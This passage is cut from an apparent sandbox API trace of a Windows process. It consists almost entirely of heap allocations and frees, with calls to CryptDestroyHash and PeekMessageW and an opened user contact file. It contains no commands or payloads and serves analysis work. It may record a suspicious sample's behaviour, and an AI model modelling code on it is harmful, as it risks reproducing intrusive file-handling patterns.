lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x11) returned 0x7ae9a8 [0029.386] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x7ae9a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0029.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0029.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0029.386] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0029.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0029.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0029.386] CryptDestroyHash (hHash=0x7c2240) returned 1 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0029.387] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.388] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0029.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0029.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0029.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0029.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2c8 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0029.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac2f0 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1af8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1968 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0029.389] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0029.390] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0029.390] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0029.390] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x88ffb0 [0029.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0029.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0029.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0029.391] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0029.391] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0029.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0029.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.391] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0029.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.391] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0029.392] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.392] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 